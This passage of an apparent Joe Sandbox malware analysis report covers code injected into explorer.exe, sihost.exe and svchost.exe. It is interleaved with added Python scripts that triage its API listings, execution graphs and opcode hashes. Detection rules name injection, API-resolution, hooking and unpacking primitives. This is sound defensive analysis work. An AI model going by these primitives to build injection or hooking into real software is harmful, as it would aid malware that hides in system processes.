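            cur["apis"].append({"api": m.group(1), "module": m.group(2), "args": args,
                                "ref": m.group(4), "subcall": line.startswith("Part of subcall")})
    return records


def _ms(arg):
    """Hex argument as an integer; the sandbox prints '?' when it could not recover a value."""
    try:
        return int(arg, 16)
    except ValueError:
        return 0


def classify(rec):
    """Editor-chosen triage rules over one function's API set (subcalls count: the report attributes them here)."""
    names = {a["api"] for a in rec["apis"]}
    findings = []
    if INJECT <= names:
        findings.append("remote-thread injection primitive: VirtualAllocEx + WriteProcessMemory + CreateRemoteThread")
    if names & LOADERS and "GetProcAddress" in names:
        findings.append("dynamic API resolution: LoadLibrary/GetModuleHandle + GetProcAddress")
    if names & QUERY_APIS and rec["pe_backed"] is False:
        findings.append("query API called from non-image-backed memory: hook candidate")
    if {"VirtualProtect", "VirtualAlloc"} <= names:
        findings.append("self-modifying/unpacking memory: VirtualAlloc + VirtualProtect")
    sleeps = [a for a in rec["apis"] if a["api"] in ("Sleep", "SleepEx")]
    if len(sleeps) >= 2:
        total = sum(_ms(a["args"][0]) for a in sleeps if a["args"])
        findings.append(f"sleep chain: {len(sleeps)} calls, {total} ms total")
    return findings


def scan(text):
    return [{"process": r["process"], "proc_id": r["proc_id"], "offset": r["offset"],
             "pe_backed": r["pe_backed"], "findings": classify(r)} for r in parse_listings(text)]


# Sample input: four listings copied from this report plus one constructed PE-backed listing (last block).
SAMPLE = """\
APIs
• GetModuleHandleA.KERNEL32(00000000,00000000,?,047E3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 047E3F2D
• Sleep.KERNEL32(000003E8,00000000,?,047E3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 047E3F4B
• Sleep.KERNEL32(000007D0), ref: 047E3F5B
• Sleep.KERNEL32(00000BB8), ref: 047E3F6B
Memory Dump Source
• Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
• Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
APIs
• LoadLibraryA.KERNEL32(047E3EBD,00000006,E8FFFE1B,00000000), ref: 047E3EC8
• GetModuleHandleA.KERNEL32(00000000,00000000,?,047E3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 047E3F2D
  • Part of subcall function 047E0C9C: GetProcAddress.KERNEL32(047E2811,047E290A), ref: 047E0CA9
Memory Dump Source
• Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
• Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
APIs
• VirtualAllocEx.KERNELBASE ref: 01391FDE
• WriteProcessMemory.KERNEL32 ref: 01392000
• CreateRemoteThread.KERNEL32 ref: 01392028
Memory Dump Source
• Source File: 00000003.00000002.2983323352.0000000001390000.00000040.00000001.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
• Snapshot File: hcaresult_3_2_1390000_explorer.jbxd
APIs
• NtQueryDirectoryFile.NTDLL ref: 013922E1
Memory Dump Source
• Source File: 00000003.00000002.2983323352.0000000001390000.00000040.00000001.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
• Snapshot File: hcaresult_3_2_1390000_explorer.jbxd
APIs
• NtQueryDirectoryFile.NTDLL ref: 00401234
Memory Dump Source
• Source File: 00000000.00000000.0000000000.0000000000400000.00000002.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
• Snapshot File: hcaresult_0_0_400000_benign.jbxd
"""

if __name__ == "__main__":
    for r in scan(SAMPLE):
        print(f"{r['process']} (pid {r['proc_id']}) @ {r['offset']} pe_backed={r['pe_backed']}: {r['findings']}")
```

The "hook candidate" rule is deliberately narrow: NtQueryDirectoryFile is called legitimately all the time, so the signal is not the API but the fact that the call site sits in memory the loader never mapped from an image, which is exactly where the 01390000 region of explorer.exe falls in this report.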

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph for 1392270 (23 basic blocks; the rendered graph is summarized here from the flattened text): the entry block 1392270-1392288 falls into 139228b-13922f1, which calls NtQueryDirectoryFile. On failure control goes straight to the exit block 1392394-1392398; otherwise 13922f7-1392309 checks the result and enters a loop whose body (139230f-139238f) calls 1392196 and branches on its return through 139231d-1392320, 1392322-1392375 and 1392377-1392383 before 139238c-139238f jumps back to 139230f; the single-instruction block 139232f returns to 139228b to issue NtQueryDirectoryFile again, and 1392385-139238a is the common tail that either continues the loop or leaves through 1392394.
                                                                                                                                                                          APIs
                                                                                                                                                                          • NtQueryDirectoryFile.NTDLL ref: 013922E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2983323352.0000000001390000.00000040.00000001.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1390000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DirectoryFileQuery
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3295332484-0
                                                                                                                                                                          • Opcode ID: 60616ae1fcc6cbf86718ecfd86d321865c6476175aa306813cb9b129d8017b94
                                                                                                                                                                          • Instruction ID: 2de871f163555cbda5ee5fb693cc3dc0d9c8073269b2e6f0d5cab27084672791
                                                                                                                                                                          • Opcode Fuzzy Hash: 60616ae1fcc6cbf86718ecfd86d321865c6476175aa306813cb9b129d8017b94
                                                                                                                                                                          • Instruction Fuzzy Hash: D741F470618E4E9FDF95EF5CC8C8BAA7BE4FB69359F40016AE909C7250D730D8848B41
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 119 1391ee1-1391f5d NtCreateUserProcess
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2983323352.0000000001390000.00000040.00000001.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1390000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateProcessUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2217836671-0
                                                                                                                                                                          • Opcode ID: 94379df3e286b699d65894a0865ea8b3d4463f1672bff53da76e62b6f5315873
                                                                                                                                                                          • Instruction ID: 32af6664475258df2025926b18748e272a5399bca74b2e2a3e5bffc18d134367
                                                                                                                                                                          • Opcode Fuzzy Hash: 94379df3e286b699d65894a0865ea8b3d4463f1672bff53da76e62b6f5315873
                                                                                                                                                                          • Instruction Fuzzy Hash: 30114C74908A8C8FDFC4EF6CC488A697BE0FB68355F54062AB859C32A0D775D8948B41
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2983323352.0000000001390000.00000040.00000001.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1390000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Virtual$Protect$Alloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2541858876-0
                                                                                                                                                                          • Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                          • Instruction ID: fdd2848cf78507cda9bbc6fa95236549967ab3c72e8ac319d269252cfd9322b7
                                                                                                                                                                          • Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                          • Instruction Fuzzy Hash: 0021D630A34C1E0BFB58A27C9859764F6D2E79C220F980295E90DE36D4ED58CC8183C6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.3004595079.0000000003450000.00000040.00000400.00020000.00000000.sdmp, Offset: 03450000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_3450000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction ID: 0ca58f45a831e95129f7947333f4d333a2c2c7856451a491e6b2d099f79754c5
                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction Fuzzy Hash: C131C57A8003047FEF01BF709D46EAA776CEF01310F04016BBD86DE1A6DA744954CAB9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2983323352.0000000001390000.00000040.00000001.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1390000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitThreadUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3424019298-0
                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction ID: de1639bc68694eddd94409e849f198f8ffd8fa0804a42f374ba823ae9a72a72a
                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction Fuzzy Hash: BE313772514206BFEF067F749D86ABA3FACEF10318F040165BD95EE0A5EA304964CBB5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2983323352.0000000001390000.00000040.00000001.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1390000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitThreadUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3424019298-0
                                                                                                                                                                          • Opcode ID: e4423c0a58cdb4c7a61b8c611d717cf6067e42c28c7b42a6ea57d7b01533138c
                                                                                                                                                                          • Instruction ID: 27b28d2f442fd771626c8c0eed648b75e2cd5673a9a19ca2b0335d9e7fd0978f
                                                                                                                                                                          • Opcode Fuzzy Hash: e4423c0a58cdb4c7a61b8c611d717cf6067e42c28c7b42a6ea57d7b01533138c
                                                                                                                                                                          • Instruction Fuzzy Hash: 9BC09B27A7490707CF18777C6C5906C795CED3113E7C05B35F467E8095DC35451642A6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:8.6%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                          Total number of Nodes:105
                                                                                                                                                                          Total number of Limit Nodes:6
                                                                                                                                                                          execution_graph (token stream behind the rendered diagram, collapsed; addresses lie in the 0xAC0000 region of process 4, sihost.exe)
                                                                                                                                                                          • Entry points (no callers in the graph): ac08d9, ac0b6b, ac1e62, ac21d1
                                                                                                                                                                          • ac08d9 → ac0cc4 → ac0c3f GetPEB (PEB read) → ac08e5 → ac0643 → ac067c → ac06c2 / ac0811 (each marked "4 API calls") → ac080f → ac08ef → ac093e → ac0cc4 GetPEB → ac094a → ac09d9 → ac0af3 ("4 API calls") → ac0b01 → ac0cc4 GetPEB → ac0b27 → ac0b65 ("4 API calls") → ac0b6a → ac08b3 → ac1e62 ("3 API calls") → ac08c7 → ac08d9 ("4 API calls"); the path ac08ef → ac093e → ac094a → ac0af1 → ac08ef is a loop
                                                                                                                                                                          • ac0811 → ac086e → ac0873 → ac0840 → ac08c5 / ac0866 / ac08d9; ac0866 → ac1e62 → ac1e73 → ac1d5a, where ac1d5a is ac1d6e → ac1d80 VirtualProtect → ac1dac → ac1daf VirtualAlloc (self-loop) → ac1de1 → ac1e09 VirtualProtect → ac1e60, and ac1e60 calls ac1d5a three more times (ac1eb9, ac1ecc, ac1edf) before returning to ac08c5
                                                                                                                                                                          • ac0b6b → ac0b7d → ac08b3 ("4 API calls") → ac0bb1 → ac0c3f GetPEB → ac0bb6
                                                                                                                                                                          • ac1e62 → ac1e73 → ac1d5a ("3 API calls") → ac1ea6 → ac1d5a → ac1eb9 → ac1d5a → ac1ecc → ac1d5a → ac1edf
                                                                                                                                                                          • ac21d1 → ac21f2 → ac2211 NtEnumerateValueKey → ac21f2 (loop) or ac226c (exit)
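The execution_graph text above is the raw token stream behind the report's rendered diagram. As an added example, not part of the report or of Joe Sandbox's tooling, the following Python parses that stream (the node and edge layout is inferred from this page and is an assumption), lists the API-annotated nodes reachable from each entry point, and flags any API that sits on a cycle. Run on an excerpt of the 0xAC0000 graph it recovers the VirtualProtect, VirtualAlloc, VirtualProtect sequence under ac1e62 and the NtEnumerateValueKey loop under ac21d1.

```python
"""Added example (not part of the Joe Sandbox report or its tooling): parse the
raw ``execution_graph`` token stream the report embeds for its rendered diagram
and list, per entry point, which Windows APIs are reached and whether each API
node sits on a cycle.  The token layout is inferred from this report's text and
is an assumption:

    <node-id> <hex-address> [annotation words ...]   defines a node
    <from-id>-><to-id>                              defines an edge

Annotations are either an API name (GetPEB, VirtualProtect, ...) or an
"<n> API calls" roll-up for a callee that is not expanded inline.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^[0-9a-f]{4,16}$")
ROLLUP_RE = re.compile(r"^\d+ API calls$")

# Excerpt copied from the report's 0xAC0000 (sihost.exe) execution_graph: the
# ac0b6b, ac21d1 and ac1e62/ac1d5a sub-graphs.  Edges to nodes outside the
# excerpt (2641->2655, 2664->2640) were dropped, so 2655 has no caller here.
SAMPLE_GRAPH = """execution_graph
2721 ac0b6b 2723 ac0b7d 2721->2723 2722 ac08b3 4 API calls 2724 ac0bb1 2722->2724
2723->2722 2725 ac0c3f GetPEB 2724->2725 2726 ac0bb6 2725->2726
2707 ac21d1 2710 ac21f2 2707->2710 2708 ac2211 NtEnumerateValueKey 2709 ac226c
2708->2709 2708->2710 2710->2708 2710->2709
2655 ac1e62 2656 ac1e73 2655->2656 2671 ac1d5a 2656->2671 2659 ac1d5a 3 API calls
2660 ac1eb9 2659->2660 2661 ac1d5a 3 API calls 2660->2661 2662 ac1ecc 2661->2662
2663 ac1d5a 3 API calls 2662->2663 2664 ac1edf 2663->2664 2672 ac1d6e 2671->2672
2673 ac1e60 2671->2673 2672->2673 2674 ac1d80 VirtualProtect 2672->2674 2673->2659
2674->2673 2675 ac1dac 2674->2675 2676 ac1daf VirtualAlloc 2675->2676 2676->2676
2677 ac1de1 2676->2677 2678 ac1e09 VirtualProtect 2677->2678 2678->2673
"""


@dataclass
class Node:
    nid: int
    addr: str
    note: str = ""

    @property
    def api(self):
        """The annotation is an API name unless it is a '<n> API calls' roll-up."""
        return self.note if self.note and not ROLLUP_RE.match(self.note) else None


@dataclass
class Graph:
    nodes: dict = field(default_factory=dict)
    succ: dict = field(default_factory=lambda: defaultdict(list))
    pred: dict = field(default_factory=lambda: defaultdict(list))


def parse_execution_graph(text):
    tokens = text.split()
    if tokens and tokens[0] == "execution_graph":
        tokens = tokens[1:]
    g, edges, cur, i = Graph(), [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            cur = None                      # annotations never follow an edge
        elif tok.isdigit() and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            cur = Node(int(tok), tokens[i + 1])
            g.nodes[cur.nid] = cur
            i += 1                          # the address token is consumed too
        elif cur is not None:
            cur.note = (cur.note + " " + tok).strip()
        i += 1
    for a, b in edges:                      # resolve once every node is known
        if a in g.nodes and b in g.nodes:
            g.succ[a].append(b)
            g.pred[b].append(a)
    return g


def entry_points(g):
    """Nodes that nothing in the graph calls or jumps to."""
    return [n for n in g.nodes if not g.pred.get(n)]


def api_nodes_from(g, root):
    """API-annotated nodes reachable from root, in depth-first order."""
    seen, found, stack = set(), [], [root]
    while stack:
        n = stack.pop()
        if n in seen:
            continue
        seen.add(n)
        if g.nodes[n].api:
            found.append(n)
        stack.extend(reversed(g.succ.get(n, ())))
    return found


def on_cycle(g, nid):
    """True when nid can reach itself, i.e. the API is invoked inside a loop."""
    stack, seen = list(g.succ.get(nid, ())), set()
    while stack:
        n = stack.pop()
        if n == nid:
            return True
        if n not in seen:
            seen.add(n)
            stack.extend(g.succ.get(n, ()))
    return False


def summarize(text):
    """{entry address: [(api address, api name, called in a loop), ...]}"""
    g = parse_execution_graph(text)
    return {
        g.nodes[r].addr: [(g.nodes[n].addr, g.nodes[n].api, on_cycle(g, n))
                          for n in api_nodes_from(g, r)]
        for r in entry_points(g)
    }


if __name__ == "__main__":
    for entry, apis in summarize(SAMPLE_GRAPH).items():
        print(entry, "->", ", ".join(f"{a}:{api}{' (loop)' if loop else ''}"
                                     for a, api, loop in apis))
```

The roll-up nodes ("3 API calls", "4 API calls") are kept as nodes but never reported as APIs, so a function that the diagram does not expand inline does not masquerade as a call; to see inside it, feed the parser the graph in which that function is the entry point, as with ac1e62 here.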

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph (basic blocks of the function at ac21d1; block id, address range, call made in the block, successors)
                                                                                                                                                                          47  ac21d1-ac21f0                         → 48, 49
                                                                                                                                                                          48  ac21f8-ac21fd                         → 51, 52
                                                                                                                                                                          49  ac21f2-ac21f6                         → 50
                                                                                                                                                                          50  ac220a-ac220e                         → 53
                                                                                                                                                                          51  ac21ff-ac2203                         → 50
                                                                                                                                                                          52  ac2205-ac2208                         → 53
                                                                                                                                                                          53  ac2211-ac2244  NtEnumerateValueKey    → 54, 55
                                                                                                                                                                          54  ac226c-ac226f                         (exit)
                                                                                                                                                                          55  ac2246-ac2249                         → 54, 56
                                                                                                                                                                          56  ac224b-ac2256  call ac2196            → 59, 60
                                                                                                                                                                          59  ac225e-ac2261                         → 54, 61
                                                                                                                                                                          60  ac2258-ac225c                         → 59
                                                                                                                                                                          61  ac2263-ac226a                         → 53 (back to the NtEnumerateValueKey block)
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.2968002124.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_ac0000_sihost.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: EnumerateValue
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1749906896-0
                                                                                                                                                                          • Opcode ID: 45d53095cbbf9c766309197109e34ac0c8c251fd450118505d4c08bfa770ae20
                                                                                                                                                                          • Instruction ID: cdfd058294846393527a23a69d82aed125c299c38b3c44931be5a47ac5480816
                                                                                                                                                                          • Opcode Fuzzy Hash: 45d53095cbbf9c766309197109e34ac0c8c251fd450118505d4c08bfa770ae20
                                                                                                                                                                          • Instruction Fuzzy Hash: F3213D31518E5D8F8F55EF1C8809FEA37E1FB68755B42032AAC19E3200D730D98087C1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.2968002124.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_ac0000_sihost.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Virtual$Protect$Alloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2541858876-0
                                                                                                                                                                          • Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                          • Instruction ID: dd34eb1389eaef043c92a696ed53661b54a7e883a9eaaee22049f10a42ac24d8
                                                                                                                                                                          • Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                          • Instruction Fuzzy Hash: E221F730B34C1D0BEB58A77C9859764F6D2E79C320F990299E91ED36E5ED58CC8183C6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph (basic blocks of the function at ac0811; block id, address range, calls made in the block, successors)
                                                                                                                                                                          11  ac0811-ac0846  call ac086e                                         → 14, 15
                                                                                                                                                                          14  ac08ad-ac08ae                                                      → 16
                                                                                                                                                                          15  ac0848-ac0851                                                      → 16, 17
                                                                                                                                                                          16  ac08af-ac08b0                                                      → 18
                                                                                                                                                                          17  ac0853-ac085c                                                      → 19, 20
                                                                                                                                                                          18  ac08b9-ac08cc  call ac1756, call ac1e62                            → 23
                                                                                                                                                                          19  ac085e                                                             → 21, 22
                                                                                                                                                                          20  ac08d0                                                             → 23
                                                                                                                                                                          21  ac08c5-ac08cc                                                      → 20
                                                                                                                                                                          22  ac0860-ac0861                                                      → 18, 26
                                                                                                                                                                          23  ac08d4         call ac08d9                                         (no successor listed)
                                                                                                                                                                          26  ac0863                                                             → 28, 29
                                                                                                                                                                          28  ac08d9-ac0906  call ac0cc4, call ac14bc, call ac0643, call ac0ce8  → 44
                                                                                                                                                                          29  ac0866-ac086f                                                      → 32, 33
                                                                                                                                                                          32  ac089e-ac08a4                                                      → 14
                                                                                                                                                                          33  ac0871-ac0897                                                      → 32
                                                                                                                                                                          44  ac090b-ac090f                                                      → 45
                                                                                                                                                                          45  ac0939         call ac093e                                         (no successor listed)
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.2968002124.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_ac0000_sihost.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction ID: 23dfea852a366a571cc3348c698cc6744426d11f639f151413aad9b7f5eb2e10
                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction Fuzzy Hash: 9231E472000204AFEF017F709E86FBA3BACEF11300F424169BD85DA0A2EA7449658BB5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:4.9%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                          Total number of Nodes:69
                                                                                                                                                                          Total number of Limit Nodes:4
                                                                                                                                                                          execution_graph (token stream behind the rendered diagram, collapsed; addresses lie in the 0x910000 region of process 5, svchost.exe)
                                                                                                                                                                          • Entry points (no callers in the graph): 9108d9, 910b6b
                                                                                                                                                                          • 9108d9 → 910cc4 → 910c3f GetPEB (PEB read) → 9108e5 → 910643 → 91067c → 9106c2 / 910811 → 91080f → 9108ef → 91093e → 910cc4 GetPEB → 91094a → 9109d9 → 910af3 → 910b01 → 910cc4 GetPEB → 910b27 → 910b65 → 910b6a → 9108b3 → 9108b9 → 9108d9 GetPEB; the path 9108ef → 91093e → 91094a → 910af1 → 9108ef is a loop
                                                                                                                                                                          • 910811 → 91086e → 910873 → 910840 → 910866 / 9108d9; 910866 → 91080f or 9108d9 → 910cc4 GetPEB → 9108e5 → 910643 → 9108ef → 91093e
                                                                                                                                                                          • 910b6b → 910b7d → 9108b3 GetPEB → 910bb1 → 910c3f GetPEB → 910bb6
                                                                                                                                                                          • Only GetPEB is annotated in this graph: it has the call layout of the 0xAC0000 graph of process 4 without the VirtualProtect/VirtualAlloc and NtEnumerateValueKey paths

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.2967861512.0000000000910000.00000040.00000001.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_910000_svchost.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction ID: 0bb578ed6cec17c8f136f477abcb2608ff25218c2125ec3b643453ee16afebde
                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction Fuzzy Hash: DE31D67220420C7FEB017B709D46BFA3B6CEF91300F4001A5BD85DA0A2DAB649D5CBB5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%
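The Opcode ID 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639 is listed above for four memory regions in three processes (explorer.exe at 0x3450000 and 0x1390000, sihost.exe at 0xAC0000, svchost.exe at 0x910000), each time with a different Instruction ID, and with API ID ExitSleepThreadUser in three of them and ExitThreadUser in one. As an added example, not part of the report or of Joe Sandbox's tooling, the following Python parses such record blocks and groups them by Opcode ID so that one function body seen in several processes is reported once with every region it was found in. Reading the snapshot name as hcaresult_<process>_<stage>_<base>_<image>.jbxd is an assumption; the code cross-checks it against the Offset: value printed beside each Source File.

```python
"""Added example (not part of the Joe Sandbox report or its tooling): group the
per-function records of a report by Opcode ID and list, for every opcode hash
seen in more than one process, the processes, images and region base addresses
it was found in.  The snapshot-file naming hcaresult_<process>_<stage>_<base>_<image>.jbxd
is an assumption inferred from this report; offset_consistent() checks it
against the "Offset:" value the report prints beside each Source File.
"""
import re
from collections import defaultdict

FIELD_RE = re.compile(r"^\s*•\s*([^:]+):\s*(.*)$")
SNAPSHOT_RE = re.compile(r"hcaresult_(\d+)_(\d+)_([0-9a-fA-F]+)_([^.]+)\.jbxd")
OFFSET_RE = re.compile(r"Offset:\s*([0-9a-fA-F]+)")

# Constructed sample: Memory Dump Source and Similarity fields of five records
# copied from this report.
SAMPLE_RECORDS = """
• Source File: 00000003.00000002.3004595079.0000000003450000.00000040.00000400.00020000.00000000.sdmp, Offset: 03450000, based on PE: false
• Snapshot File: hcaresult_3_2_3450000_explorer.jbxd
• API ID: ExitSleepThreadUser
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: 0ca58f45a831e95129f7947333f4d333a2c2c7856451a491e6b2d099f79754c5
• Source File: 00000003.00000002.2983323352.0000000001390000.00000040.00000001.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
• Snapshot File: hcaresult_3_2_1390000_explorer.jbxd
• API ID: ExitThreadUser
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: de1639bc68694eddd94409e849f198f8ffd8fa0804a42f374ba823ae9a72a72a
• Source File: 00000003.00000002.2983323352.0000000001390000.00000040.00000001.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
• Snapshot File: hcaresult_3_2_1390000_explorer.jbxd
• API ID: ExitThreadUser
• Opcode ID: e4423c0a58cdb4c7a61b8c611d717cf6067e42c28c7b42a6ea57d7b01533138c
• Instruction ID: 27b28d2f442fd771626c8c0eed648b75e2cd5673a9a19ca2b0335d9e7fd0978f
• Source File: 00000004.00000002.2968002124.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
• Snapshot File: hcaresult_4_2_ac0000_sihost.jbxd
• API ID: ExitSleepThreadUser
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
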